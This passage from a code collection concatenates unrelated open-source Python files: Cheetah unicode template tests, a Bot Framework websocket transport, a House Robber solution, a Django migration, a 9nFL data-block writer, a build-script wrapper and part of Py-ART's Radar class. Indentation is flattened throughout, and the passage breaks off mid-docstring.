otherT = Template.compile(source="Other template with |$v|")
other = otherT()
t.other = other
t.v = u'Unicode String'
t.other.v = u'Unicode String'
assert unicode(t())
class JBQ_UTF8_Test2(unittest.TestCase):
def runTest(self):
t = Template.compile(source="""Main file with |$v|
$other""")
otherT = Template.compile(source="Other template with |$v|")
other = otherT()
t.other = other
t.v = u'Unicode String with eacute é'
t.other.v = u'Unicode String'
assert unicode(t())
class JBQ_UTF8_Test3(unittest.TestCase):
def runTest(self):
t = Template.compile(source="""Main file with |$v|
$other""")
otherT = Template.compile(source="Other template with |$v|")
other = otherT()
t.other = other
t.v = u'Unicode String with eacute é'
t.other.v = u'Unicode String and an eacute é'
assert unicode(t())
class JBQ_UTF8_Test4(unittest.TestCase):
def runTest(self):
t = Template.compile(source="""#encoding utf-8
Main file with |$v| and eacute in the template é""")
t.v = 'Unicode String'
assert unicode(t())
class JBQ_UTF8_Test5(unittest.TestCase):
def runTest(self):
t = Template.compile(source="""#encoding utf-8
Main file with |$v| and eacute in the template é""")
t.v = u'Unicode String'
assert unicode(t())
class JBQ_UTF8_Test6(unittest.TestCase):
def runTest(self):
source = """#encoding utf-8
#set $someUnicodeString = u"Bébé"
Main file with |$v| and eacute in the template é"""
t = Template.compile(source=source)
t.v = u'Unicode String'
assert unicode(t())
class JBQ_UTF8_Test7(CommandLineTest):
def runTest(self):
source = """#encoding utf-8
#set $someUnicodeString = u"Bébé"
Main file with |$v| and eacute in the template é"""
template = self.createAndCompile(source)
template.v = u'Unicode String'
assert unicode(template())
class JBQ_UTF8_Test8(CommandLineTest):
def testStaticCompile(self):
source = """#encoding utf-8
#set $someUnicodeString = u"Bébé"
$someUnicodeString"""
template = self.createAndCompile(source)()
a = unicode(template)
if PY2:
a = a.encode("utf-8")
self.assertEqual("Bébé", a)
def testDynamicCompile(self):
source = """#encoding utf-8
#set $someUnicodeString = u"Bébé"
$someUnicodeString"""
template = Template(source=source)
a = unicode(template)
if PY2:
a = a.encode("utf-8")
self.assertEqual("Bébé", a)
class EncodeUnicodeCompatTest(unittest.TestCase):
"""
Taken initially from Red Hat's bugzilla #529332
https://bugzilla.redhat.com/show_bug.cgi?id=529332
"""
def runTest(self):
t = Template("""Foo ${var}""", filter='EncodeUnicode')
t.var = u"Text with some non-ascii characters: åäö"
rc = t.respond()
assert isinstance(rc, unicode), \
('Template.respond() should return unicode', rc)
rc = str(t)
assert isinstance(rc, str), \
('Template.__str__() should return a UTF-8 encoded string', rc)
class Unicode_in_SearchList_Test(CommandLineTest):
def test_BasicASCII(self):
source = '''This is $adjective'''
template = self.createAndCompile(source)
assert template and issubclass(template, Template)
template = template(searchList=[{'adjective': u'neat'}])
assert template.respond()
def test_Thai(self):
# The string is something in Thai
source = '''This is $foo $adjective'''
template = self.createAndCompile(source)
assert template and issubclass(template, Template)
template = template(
searchList=[{
'foo': 'bar',
'adjective':
u'\u0e22\u0e34\u0e19\u0e14\u0e35\u0e15'
u'\u0e49\u0e2d\u0e19\u0e23\u0e31\u0e1a'
}])
assert template.respond()
def test_Thai_utf8(self):
utf8 = '\xe0\xb8\xa2\xe0\xb8\xb4\xe0\xb8\x99\xe0' \
'\xb8\x94\xe0\xb8\xb5\xe0\xb8\x95\xe0\xb9\x89\xe0' \
'\xb8\xad\xe0\xb8\x99\xe0\xb8\xa3\xe0\xb8\xb1\xe0\xb8\x9a'
source = '''This is $adjective'''
template = self.createAndCompile(source)
assert template and issubclass(template, Template)
template = template(searchList=[{'adjective': utf8}])
assert template.respond()
class InlineSpanishTest(unittest.TestCase):
def setUp(self):
super(InlineSpanishTest, self).setUp()
self.template = '''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Pagina del vendedor</title>
</head>
<body>
$header
<h2>Bienvenido $nombre.</h2>
<br /><br /><br />
<center>
Usted tiene $numpedidos_noconf <a href="">pedidós</a> sin confirmar.
<br /><br />
Bodega tiene fecha para $numpedidos_bodega <a href="">pedidos</a>.
</center>
</body>
</html>
''' # noqa
if PY2: # In PY3 templates are already unicode
def test_failure(self):
""" Test a template lacking a proper #encoding tag """
self.assertRaises(UnicodeDecodeError, Template, self.template,
searchList=[{'header': '',
'nombre': '',
'numpedidos_bodega': '',
'numpedidos_noconf': ''}])
def test_success(self):
""" Test a template with a proper #encoding tag """
template = '#encoding utf-8\n%s' % self.template
template = Template(template, searchList=[{'header': '',
'nombre': '',
'numpedidos_bodega': '',
'numpedidos_noconf': ''}])
self.assertTrue(unicode(template))
class CompilerTest(unittest.TestCase):
def test_compiler_str(self):
""" Test Compiler.__str__ """
source = """#encoding utf-8
#set $someUnicodeString = u"Bébé"
$someUnicodeString"""
compiler = Compiler(source)
self.assertIsInstance(str(compiler), str)
self.assertEqual(compiler.getModuleEncoding(), 'utf-8')
|
libraries/botframework-streaming/botframework/streaming/transport/web_socket/web_socket_transport.py
|
andreikop/botbuilder-python
| 388 |
121983
|
<gh_stars>100-1000
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import traceback
from typing import List
from botframework.streaming.transport import TransportReceiverBase, TransportSenderBase
from .web_socket import WebSocket
from .web_socket_message_type import WebSocketMessageType
from .web_socket_close_status import WebSocketCloseStatus
from .web_socket_state import WebSocketState
class WebSocketTransport(TransportReceiverBase, TransportSenderBase):
def __init__(self, web_socket: WebSocket):
self._socket = web_socket
@property
def is_connected(self):
# TODO: mock logic
return self._socket.status == WebSocketState.OPEN
async def close(self):
# TODO: mock logic
if self._socket.status == WebSocketState.OPEN:
try:
await self._socket.close(
WebSocketCloseStatus.NORMAL_CLOSURE,
"Closed by the WebSocketTransport",
)
except Exception:
# pylint: disable=pointless-string-statement
"""
Any exception thrown here will be caused by the socket already being closed,
which is the state we want to put it in by calling this method, which
means we don't care if it was already closed and threw an exception
when we tried to close it again.
"""
traceback.print_exc()
# TODO: might need to remove offset and count if no segmentation possible
# TODO: considering to create a BFTransportBuffer class to abstract the logic of binary buffers adapting to
# current interfaces
async def receive(
self, buffer: List[int], offset: int = 0, count: int = None
) -> int:
try:
if self._socket:
result = await self._socket.receive()
buffer_index = offset
result_length = count if count is not None else len(result.data)
for result_index in range(result_length):
buffer[buffer_index] = result.data[result_index]
buffer_index += 1
if result.message_type == WebSocketMessageType.CLOSE:
await self._socket.close(
WebSocketCloseStatus.NORMAL_CLOSURE, "Socket closed"
)
# Depending on ws implementation library next line might not be necessary
if self._socket.status == WebSocketState.CLOSED:
self._socket.dispose()
return result_length
except Exception as error:
# Exceptions of the three types below will also have set the socket's state to closed, which fires an
# event consumers of this class are subscribed to and have handling around. Any other exception needs to
# be thrown to cause a non-transport-connectivity failure.
raise error
# TODO: might need to remove offset and count if no segmentation possible (or put them in BFTransportBuffer)
async def send(self, buffer: List[int], offset: int = 0, count: int = None) -> int:
try:
if self._socket:
await self._socket.send(
buffer[offset:count] if count is not None else buffer,
WebSocketMessageType.BINARY,
True,
)
return count or len(buffer)
except Exception as error:
# Exceptions of the three types below will also have set the socket's state to closed, which fires an
# event consumers of this class are subscribed to and have handling around. Any other exception needs to
# be thrown to cause a non-transport-connectivity failure.
traceback.print_exc()
raise error
return 0
|
leetcode.com/python/198_House_Robber.py
|
vansh-tiwari/coding-interview-gym
| 713 |
121986
|
<filename>leetcode.com/python/198_House_Robber.py
#
# # Recursive + memo (top-down)
# class Solution(object):
# def rob(self, nums):
# """
# :type nums: List[int]
# :rtype: int
# """
# cache = [-1] * len(nums)
# return self.robHelper(nums, len(nums) - 1, cache)
#
# def robHelper(self, nums, currentHouse, cache):
# if currentHouse < 0:
# return 0
# if cache[currentHouse] >= 0:
# return cache[currentHouse]
# robbedMoney = max(self.robHelper(nums, currentHouse - 2, cache) + nums[currentHouse],
# self.robHelper(nums, currentHouse - 1, cache))
# cache[currentHouse] = robbedMoney
# return robbedMoney
# Iterative + 2 variables (bottom-up)
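# Recurrence: best(i) = max(nums[i] + best(i - 2), best(i - 1)); only the
# two previous values are ever needed, so two rolling variables replace
# the O(n) dp array.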
class Solution(object):
def rob(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if len(nums) <= 0:
return 0
previousRobbedMoney, currentRobbedMoney = 0, nums[0]
for i in range(1, len(nums)):
currentRobbedMoneyHolder = currentRobbedMoney
currentRobbedMoney = max(nums[i] + previousRobbedMoney, currentRobbedMoney)
previousRobbedMoney = currentRobbedMoneyHolder
return currentRobbedMoney
sol = Solution()
nums = [1,2,3,1]
out = sol.rob(nums)
print("Res: ", out)
|
maro/cli/grass/lib/services/node_api_server/root.py
|
yangboz/maro
| 598 |
121988
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
""" A Flask server for MARO Node API Server.
Hosted by gunicorn at systemd.
"""
from flask import Flask
from .blueprints.containers import blueprint as container_blueprint
from .blueprints.status import blueprint as status_blueprint
app = Flask(__name__)
app.url_map.strict_slashes = False
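# treat URLs with and without a trailing slash as the same endpoint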
# Blueprints related
app.register_blueprint(blueprint=container_blueprint)
app.register_blueprint(blueprint=status_blueprint)
|
Lib/test/test_compiler/testcorpus/02_expr_rel.py
|
diogommartins/cinder
| 1,886 |
121990
|
<reponame>diogommartins/cinder<gh_stars>1000+
a == b
a != b
a < b
a <= b
a > b
a >= b
a is b
a is not b
a in b
a not in b
|
lldb/test/API/dotest.py
|
medismailben/llvm-project
| 2,338 |
122025
|
<reponame>medismailben/llvm-project
#!/usr/bin/env python
if __name__ == "__main__":
import use_lldb_suite
import lldbsuite.test
lldbsuite.test.run_suite()
|
symposion/reviews/migrations/0002_auto_20150812_0920.py
|
azkarmoulana/pycon
| 154 |
122050
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reviews', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='notificationtemplate',
name='from_address',
field=models.EmailField(max_length=254),
),
migrations.AlterField(
model_name='resultnotification',
name='from_address',
field=models.EmailField(max_length=254),
),
migrations.AlterField(
model_name='resultnotification',
name='to_address',
field=models.EmailField(max_length=254),
),
]
|
src/DataJoin/data_join/data_block_maker.py
|
huangwei19/9nfl
| 103 |
122081
|
# Copyright 2020 The 9nFL Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import logging
import os
import uuid
import tensorflow.compat.v1 as tf
from google.protobuf import text_format
from tensorflow.compat.v1 import gfile
from DataJoin.common import data_join_service_pb2 as data_join_pb
from DataJoin.utils.process_manager import tf_record_iterator_factory, data_block_meta_file_name_wrap, \
block_id_wrap, data_block_file_name_wrap, partition_id_wrap
from DataJoin.utils.base import get_host_ip
import requests
from DataJoin.config import HEADERS, HTTP_SERVICE_PORT, removed_items_nums_from_buffer
host_ip = get_host_ip()
mode = os.environ.get("MODE", None)
def save_data_block_info(meta_path, block_path):
action = getattr(requests, 'POST'.lower(), None)
data = {'dfs_data_block_meta': meta_path, 'dfs_data_block': block_path}
url = "http://{0}:{1}/v1/parse/data/block/meta".format(str(host_ip), HTTP_SERVICE_PORT)
response = action(url=url, json=data, headers=HEADERS)
res = response.json()
logging.info('request result is :%s' % res)
class DataBlockMaker(object):
tmp_file_path_counter = 0
def __init__(self, data_block_dir_name, data_source_name, partition_id,
data_block_index, example_num_threshold=None):
self._data_source_name = data_source_name
self._data_block_manager = None
self._saved_example_num = 0
self._partition_id = partition_id
self._data_block_meta = data_join_pb.DataBlockMeta()
self._data_block_meta.partition_id = partition_id
self._data_block_meta.data_block_index = data_block_index
self._data_block_meta.follower_restart_index = 0
self._example_num_threshold = example_num_threshold
self._data_block_dir_name = data_block_dir_name
self._tmp_file_path = self._make_tmp_file_path()
self._tf_record_writer = tf.io.TFRecordWriter(self._tmp_file_path)
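# records are written to a temporary file first; data_block_finalizer()
# renames it to the final block path, so readers never observe a
# partially written data block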
def build_data_block_manager(self, data_block_manager):
self._data_block_manager = data_block_manager
def save(self, data_record, example_id, event_time):
self._tf_record_writer.write(data_record)
self._data_block_meta.example_ids.append(example_id)
if self._saved_example_num == 0:
self._data_block_meta.start_time = event_time
self._data_block_meta.end_time = event_time
else:
if event_time < self._data_block_meta.start_time:
self._data_block_meta.start_time = event_time
if event_time > self._data_block_meta.end_time:
self._data_block_meta.end_time = event_time
self._saved_example_num += 1
def init_maker_by_input_meta(self, data_block_meta):
self._partition_id = data_block_meta.partition_id
self._example_num_threshold = None
self._data_block_meta = data_block_meta
def set_restart_data_join_index(self, restart_data_join_index):
self._data_block_meta.follower_restart_index = restart_data_join_index
def is_data_block_exceed_threshold(self):
if (self._example_num_threshold is not None and
len(self._data_block_meta.example_ids) >=
self._example_num_threshold):
return True
return False
def save_data_record(self, record):
self._tf_record_writer.write(record)
self._saved_example_num += 1
def _make_tmp_file_path(self):
tmp_file_name = str(uuid.uuid1()) + '-{}.tmp'.format(self.tmp_file_path_counter)
self.tmp_file_path_counter += 1
return os.path.join(self._obtain_data_block_dir(), tmp_file_name)
def _make_data_block_meta(self):
meta_file_path_tmp = self._make_tmp_file_path()
with tf.io.TFRecordWriter(meta_file_path_tmp) as meta_writer:
meta_writer.write(text_format.MessageToString(self._data_block_meta).encode())
if self._data_block_manager is not None:
meta_file_path = self._data_block_manager.update_data_block_meta(
meta_file_path_tmp, self._data_block_meta
)
else:
meta_file_name = data_block_meta_file_name_wrap(self._data_source_name,
self._partition_id,
self._data_block_meta.data_block_index)
meta_file_path = os.path.join(self._obtain_data_block_dir(), meta_file_name)
gfile.Rename(meta_file_path_tmp, meta_file_path)
return meta_file_path
def data_block_finalizer(self):
assert self._saved_example_num == len(self._data_block_meta.example_ids)
self._tf_record_writer.close()
if len(self._data_block_meta.example_ids) > 0:
self._data_block_meta.block_id = block_id_wrap(self._data_source_name,
self._data_block_meta)
data_block_path = os.path.join(
self._obtain_data_block_dir(),
data_block_file_name_wrap(
self._data_source_name,
self._data_block_meta
)
)
gfile.Rename(self._tmp_file_path, data_block_path, True)
meta_path = self._make_data_block_meta()
if mode == "distribute":
save_data_block_info(meta_path, data_block_path)
return self._data_block_meta
gfile.Remove(self._tmp_file_path)
return None
def __del__(self):
if self._tf_record_writer is not None:
del self._tf_record_writer
def _obtain_data_block_dir(self):
return os.path.join(
self._data_block_dir_name, partition_id_wrap(self._partition_id)
)
|
rkqc/make.py
|
clairechingching/ScaffCC
| 158 |
122089
|
<reponame>clairechingching/ScaffCC<filename>rkqc/make.py
#!/usr/bin/env python
import subprocess, sys
tee="tee -a" #append
ROOT_DIR=sys.path[0]
script_args = sys.argv
script_name = script_args[0]
def failure():
print ("couldn't parse arguments. Try "+ script_name +" -h")
sys.exit(1);
if len(sys.argv) == 1:
failure()
script_args.pop(0)
script = script_args.pop(0);
validScripts = ["bootstrap", "build", "clean"]
validScriptsDesc =[
"initializes the revkit directory and libraries",
"builds the algorithms",
"cleans the revkit directory"]
if script in ("-h", "--help"):
print ("valid scripts are: " + ', '.join(validScripts))
for x in range (0, len(validScripts)):
print ("- " + validScripts[x] + ": " + validScriptsDesc[x])
print ("Take a look at doc/README for further information.")
sys.exit(2)
elif script in (validScripts):
SCRIPTS_DIR = ROOT_DIR+"/scripts/"
LOG_DIR=ROOT_DIR + "/log"
LOGFILE_SUFFIX=".log"
LOGFILE=LOG_DIR + "/" + script + LOGFILE_SUFFIX
ERRFILE=LOG_DIR + "/" + script + "_error" + LOGFILE_SUFFIX
init = subprocess.Popen([SCRIPTS_DIR + "init" + " " + LOGFILE + " " + ERRFILE], shell=True )
if init.wait() != 0:
print ("init error")
sys.exit(1);
proc = subprocess.Popen([SCRIPTS_DIR + script + " " +( ' '.join(script_args))],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
out = subprocess.Popen([tee + " " + LOGFILE],
stdin=proc.stdout,
shell=True
)
err = subprocess.Popen([tee + " " + ERRFILE],
stdin=proc.stderr,
shell=True
)
exit(proc.wait()) #exit with the return code of the script
else:
failure()
|
tests/data/10.json.py
|
lemon24/reader
| 205 |
122145
|
<filename>tests/data/10.json.py
import datetime
from reader import Content
from reader import Enclosure
from reader._types import EntryData
from reader._types import FeedData
feed = FeedData(
url='{}10.json'.format(url_base),
version='json10',
)
entries = []
|
pycwr/core/PyartRadar.py
|
aliny2003/pycwr
| 144 |
122183
|
"""
## pyart radar object
pyart.core.radar
================
A general central radial scanning (or dwelling) instrument class.
.. autosummary::
:toctree: generated/
_rays_per_sweep_data_factory
_gate_data_factory
_gate_lon_lat_data_factory
_gate_altitude_data_factory
.. autosummary::
:toctree: generated/
:template: dev_template.rst
Radar
"""
# the code for the Radar object in this file was adapted from pyart by <NAME>. & <NAME>.
# https://github.com/ARM-DOE/pyart
from __future__ import print_function
import numpy as np
import sys
from ..configure.pyart_config import get_metadata
from ..configure.pyart_lazydict import LazyLoadDict
from .transforms import antenna_vectors_to_cartesian, cartesian_to_geographic
class Radar(object):
"""
A class for storing antenna coordinate radar data.
The structure of the Radar class is based on the CF/Radial Data file
format. Global attributes and variables (section 4.1 and 4.3) are
represented as a dictionary in the metadata attribute. Other required and
optional variables are represented as dictionaries in a attribute with the
same name as the variable in the CF/Radial standard. When a optional
attribute not present the attribute has a value of None. The data for a
given variable is stored in the dictionary under the 'data' key. Moment
field data is stored as a dictionary of dictionaries in the fields
attribute. Sub-convention variables are stored as a dictionary of
dictionaries under the meta_group attribute.
Refer to the attribute section for information on the parameters.
Attributes
----------
time : dict
Time at the center of each ray.
range : dict
Range to the center of each gate (bin).
fields : dict of dicts
Moment fields.
metadata : dict
Metadata describing the instrument and data.
scan_type : str
Type of scan, one of 'ppi', 'rhi', 'sector' or 'other'. If the scan
volume contains multiple sweep modes this should be 'other'.
latitude : dict
Latitude of the instrument.
longitude : dict
Longitude of the instrument.
altitude : dict
Altitude of the instrument, above sea level.
altitude_agl : dict or None
Altitude of the instrument above ground level. If not provided this
attribute is set to None, indicating this parameter is not available.
sweep_number : dict
The number of the sweep in the volume scan, 0-based.
sweep_mode : dict
Sweep mode for each mode in the volume scan.
fixed_angle : dict
Target angle for the sweep. Azimuth angle in RHI modes, elevation
angle in all other modes.
sweep_start_ray_index : dict
Index of the first ray in each sweep relative to the start of the
volume, 0-based.
sweep_end_ray_index : dict
Index of the last ray in each sweep relative to the start of the
volume, 0-based.
rays_per_sweep : LazyLoadDict
Number of rays in each sweep. The data key of this attribute is
created upon first access from the data in the sweep_start_ray_index and
sweep_end_ray_index attributes. If the sweep locations need to be
modified, do this prior to accessing this attribute or use
:py:func:`init_rays_per_sweep` to reset the attribute.
target_scan_rate : dict or None
Intended scan rate for each sweep. If not provided this attribute is
set to None, indicating this parameter is not available.
rays_are_indexed : dict or None
Indication of whether ray angles are indexed to a regular grid in
each sweep. If not provided this attribute is set to None, indicating
ray angle spacing is not determined.
ray_angle_res : dict or None
If rays_are_indexed is not None, this provides the angular resolution
of the grid. If not provided or available this attribute is set to
None.
azimuth : dict
Azimuth of antenna, relative to true North. Azimuth angles are
recommended to be expressed in the range of [0, 360], but other
representations are not forbidden.
elevation : dict
Elevation of antenna, relative to the horizontal plane. Elevation
angles are recommended to be expressed in the range of [-180, 180],
but other representations are not forbidden.
gate_x, gate_y, gate_z : LazyLoadDict
Location of each gate in a Cartesian coordinate system assuming a
standard atmosphere with a 4/3 Earth's radius model. The data keys of
these attributes are created upon first access from the data in the
range, azimuth and elevation attributes. If these attributes are
changed use :py:func:`init_gate_x_y_z` to reset.
gate_longitude, gate_latitude : LazyLoadDict
Geographic location of each gate. The projection parameter(s) defined
in the `projection` attribute are used to perform an inverse map
projection from the Cartesian gate locations relative to the radar
location to longitudes and latitudes. If these attributes are changed
use :py:func:`init_gate_longitude_latitude` to reset the attributes.
projection : dict or str
Projection parameters defining the map projection used to transform
from Cartesian to geographic coordinates. The default dictionary sets
the 'proj' key to 'pyart_aeqd' indicating that the native Py-ART
azimuthal equidistant projection is used. This can be modified to
specify a valid pyproj.Proj projparams dictionary or string.
The special key '_include_lon_0_lat_0' is removed when interpreting
this dictionary. If this key is present and set to True, which is
required when proj='pyart_aeqd', then the radar longitude and
latitude will be added to the dictionary as 'lon_0' and 'lat_0'.
gate_altitude : LazyLoadDict
The altitude of each radar gate as calculated from the altitude of the
radar and the Cartesian z location of each gate. If this attribute
is changed use :py:func:`init_gate_altitude` to reset the attribute.
scan_rate : dict or None
Actual antenna scan rate. If not provided this attribute is set to
None, indicating this parameter is not available.
antenna_transition : dict or None
Flag indicating if the antenna is in transition, 1 = yes, 0 = no.
If not provided this attribute is set to None, indicating this
parameter is not available.
rotation : dict or None
The rotation angle of the antenna. The angle about the aircraft
longitudinal axis for a vertically scanning radar.
tilt : dict or None
The tilt angle with respect to the plane orthogonal (Z-axis) to
aircraft longitudinal axis.
roll : dict or None
The roll angle of platform, for aircraft right wing down is positive.
drift : dict or None
Drift angle of antenna, the angle between heading and track.
heading : dict or None
Heading (compass) angle, clockwise from north.
pitch : dict or None
Pitch angle of antenna, for aircraft nose up is positive.
georefs_applied : dict or None
Indicates whether the variables have had georeference calculations
applied, leading to Earth-centric azimuth and elevation angles.
instrument_parameters : dict of dicts or None
Instrument parameters. If not provided this attribute is set to None,
indicating these parameters are not available. This dictionary also
includes variables in the radar_parameters CF/Radial subconvention.
radar_calibration : dict of dicts or None
Instrument calibration parameters. If not provided this attribute is
set to None, indicating these parameters are not available
ngates : int
Number of gates (bins) in a ray.
nrays : int
Number of rays in the volume.
nsweeps : int
Number of sweep in the volume.
"""
def __init__(self, time, _range, fields, metadata, scan_type,
latitude, longitude, altitude,
sweep_number, sweep_mode, fixed_angle, sweep_start_ray_index,
sweep_end_ray_index,
azimuth, elevation,
altitude_agl=None,
target_scan_rate=None, rays_are_indexed=None,
ray_angle_res=None,
scan_rate=None, antenna_transition=None,
instrument_parameters=None,
radar_calibration=None,
rotation=None, tilt=None, roll=None, drift=None, heading=None,
pitch=None, georefs_applied=None,
):
if 'calendar' not in time:
time['calendar'] = 'gregorian'
self.time = time
self.range = _range
self.fields = fields
self.metadata = metadata
self.scan_type = scan_type
self.latitude = latitude
self.longitude = longitude
self.altitude = altitude
self.altitude_agl = altitude_agl # optional
self.sweep_number = sweep_number
self.sweep_mode = sweep_mode
self.fixed_angle = fixed_angle
self.sweep_start_ray_index = sweep_start_ray_index
self.sweep_end_ray_index = sweep_end_ray_index
self.target_scan_rate = target_scan_rate # optional
self.rays_are_indexed = rays_are_indexed # optional
self.ray_angle_res = ray_angle_res # optional
self.azimuth = azimuth
self.elevation = elevation
self.scan_rate = scan_rate # optional
self.antenna_transition = antenna_transition # optional
self.rotation = rotation # optional
self.tilt = tilt # optional
self.roll = roll # optional
self.drift = drift # optional
self.heading = heading # optional
self.pitch = pitch # optional
self.georefs_applied = georefs_applied # optional
self.instrument_parameters = instrument_parameters # optional
self.radar_calibration = radar_calibration # optional
self.ngates = len(_range['data'])
self.nrays = len(time['data'])
self.nsweeps = len(sweep_number['data'])
self.projection = {'proj': 'pyart_aeqd', '_include_lon_0_lat_0': True}
# initalize attributes with lazy load dictionaries
self.init_rays_per_sweep()
self.init_gate_x_y_z()
self.init_gate_longitude_latitude()
self.init_gate_altitude()
def __getstate__(self):
""" Return object's state which can be pickled. """
state = self.__dict__.copy()  # copy the object's state
# Remove unpicklable entries (those which are lazily loaded)
del state['rays_per_sweep']
del state['gate_x']
del state['gate_y']
del state['gate_z']
del state['gate_longitude']
del state['gate_latitude']
del state['gate_altitude']
return state
def __setstate__(self, state):
""" Restore unpicklable entries from pickled object. """
self.__dict__.update(state)
self.init_rays_per_sweep()
self.init_gate_x_y_z()
self.init_gate_longitude_latitude()
self.init_gate_altitude()
# Attribute init/reset method
def init_rays_per_sweep(self):
""" Initialize or reset the rays_per_sweep attribute. """
lazydic = LazyLoadDict(get_metadata('rays_per_sweep'))
lazydic.set_lazy('data', _rays_per_sweep_data_factory(self))
self.rays_per_sweep = lazydic
def init_gate_x_y_z(self):
""" Initialize or reset the gate_{x, y, z} attributes. """
gate_x = LazyLoadDict(get_metadata('gate_x'))
gate_x.set_lazy('data', _gate_data_factory(self, 0))
self.gate_x = gate_x
gate_y = LazyLoadDict(get_metadata('gate_y'))
gate_y.set_lazy('data', _gate_data_factory(self, 1))
self.gate_y = gate_y
gate_z = LazyLoadDict(get_metadata('gate_z'))
gate_z.set_lazy('data', _gate_data_factory(self, 2))
self.gate_z = gate_z
def init_gate_longitude_latitude(self):
"""
Initialize or reset the gate_longitude and gate_latitude attributes.
"""
gate_longitude = LazyLoadDict(get_metadata('gate_longitude'))
gate_longitude.set_lazy('data', _gate_lon_lat_data_factory(self, 0))
self.gate_longitude = gate_longitude
gate_latitude = LazyLoadDict(get_metadata('gate_latitude'))
gate_latitude.set_lazy('data', _gate_lon_lat_data_factory(self, 1))
self.gate_latitude = gate_latitude
def init_gate_altitude(self):
""" Initialize the gate_altitude attribute. """
gate_altitude = LazyLoadDict(get_metadata('gate_altitude'))
gate_altitude.set_lazy('data', _gate_altitude_data_factory(self))
self.gate_altitude = gate_altitude
# private functions for checking limits, etc.
def _check_sweep_in_range(self, sweep):
""" Check that a sweep number is in range. """
if sweep < 0 or sweep >= self.nsweeps:
raise IndexError('Sweep out of range: ', sweep)
return
# public check functions
def check_field_exists(self, field_name):
"""
Check that a field exists in the fields dictionary.
If the field does not exist raise a KeyError.
Parameters
----------
field_name : str
Name of field to check.
"""
if field_name not in self.fields:
raise KeyError('Field not available: ' + field_name)
return
# Iterators
def iter_start(self):
""" Return an iterator over the sweep start indices. """
return (s for s in self.sweep_start_ray_index['data'])
def iter_end(self):
""" Return an iterator over the sweep end indices. """
return (s for s in self.sweep_end_ray_index['data'])
def iter_start_end(self):
""" Return an iterator over the sweep start and end indices. """
return ((s, e) for s, e in zip(self.iter_start(), self.iter_end()))
def iter_slice(self):
""" Return an iterator which returns sweep slice objects. """
return (slice(s, e+1) for s, e in self.iter_start_end())
def iter_field(self, field_name):
""" Return an iterator which returns sweep field data. """
self.check_field_exists(field_name)
return (self.fields[field_name]['data'][s] for s in self.iter_slice())
def iter_azimuth(self):
""" Return an iterator which returns sweep azimuth data. """
return (self.azimuth['data'][s] for s in self.iter_slice())
def iter_elevation(self):
""" Return an iterator which returns sweep elevation data. """
return (self.elevation['data'][s] for s in self.iter_slice())
# get methods
def get_start(self, sweep):
""" Return the starting ray index for a given sweep. """
self._check_sweep_in_range(sweep)
return self.sweep_start_ray_index['data'][sweep]
def get_end(self, sweep):
""" Return the ending ray for a given sweep. """
self._check_sweep_in_range(sweep)
return self.sweep_end_ray_index['data'][sweep]
def get_start_end(self, sweep):
""" Return the starting and ending ray for a given sweep. """
return self.get_start(sweep), self.get_end(sweep)
def get_slice(self, sweep):
""" Return a slice for selecting rays for a given sweep. """
start, end = self.get_start_end(sweep)
return slice(start, end+1)
def get_field(self, sweep, field_name, copy=False):
"""
Return the field data for a given sweep.
When used with :py:func:`get_gate_x_y_z` this method can be used to
obtain the data needed for plotting a radar field with the correct
spatial context.
Parameters
----------
sweep : int
Sweep number to retrieve data for, 0 based.
field_name : str
Name of the field from which data should be retrieved.
copy : bool, optional
True to return a copy of the data. False, the default, returns
a view of the data (when possible), changing this data will
change the data in the underlying Radar object.
Returns
-------
data : array
Array containing data for the requested sweep and field.
"""
self.check_field_exists(field_name)
s = self.get_slice(sweep)
data = self.fields[field_name]['data'][s]
if copy:
return data.copy()
else:
return data
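# A minimal usage sketch ('reflectivity' is a hypothetical field name):
#   x, y, z = radar.get_gate_x_y_z(0)
#   refl = radar.get_field(0, 'reflectivity')
#   # x, y and refl share the shape (rays_in_sweep, ngates) and can be
#   # passed directly to e.g. matplotlib's pcolormesh for a PPI-style plot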
def get_azimuth(self, sweep, copy=False):
"""
Return an array of azimuth angles for a given sweep.
Parameters
----------
sweep : int
Sweep number to retrieve data for, 0 based.
copy : bool, optional
True to return a copy of the azimuths. False, the default, returns
a view of the azimuths (when possible), changing this data will
change the data in the underlying Radar object.
Returns
-------
azimuths : array
Array containing the azimuth angles for a given sweep.
"""
s = self.get_slice(sweep)
azimuths = self.azimuth['data'][s]
if copy:
return azimuths.copy()
else:
return azimuths
def get_elevation(self, sweep, copy=False):
"""
Return an array of elevation angles for a given sweep.
Parameters
----------
sweep : int
Sweep number to retrieve data for, 0 based.
copy : bool, optional
True to return a copy of the elevations. False, the default,
returns a view of the elevations (when possible), changing this
data will change the data in the underlying Radar object.
Returns
-------
elevation : array
Array containing the elevation angles for a given sweep.
"""
s = self.get_slice(sweep)
elevation = self.elevation['data'][s]
if copy:
return elevation.copy()
else:
return elevation
def get_gate_x_y_z(self, sweep, edges=False, filter_transitions=False):
"""
Return the x, y and z gate locations in meters for a given sweep.
With the default parameter this method returns the same data as
contained in the gate_x, gate_y and gate_z attributes but this method
performs the gate location calculations only for the specified sweep
and therefore is more efficient than accessing this data through these
attributes.
When used with :py:func:`get_field` this method can be used to obtain
the data needed for plotting a radar field with the correct spatial
context.
Parameters
----------
sweep : int
Sweep number to retrieve gate locations from, 0 based.
edges : bool, optional
True to return the locations of the gate edges calculated by
interpolating between the range, azimuths and elevations.
False (the default) will return the locations of the gate centers
with no interpolation.
filter_transitions : bool, optional
True to remove rays where the antenna was in transition between
sweeps. False will include these rays. No rays will be removed
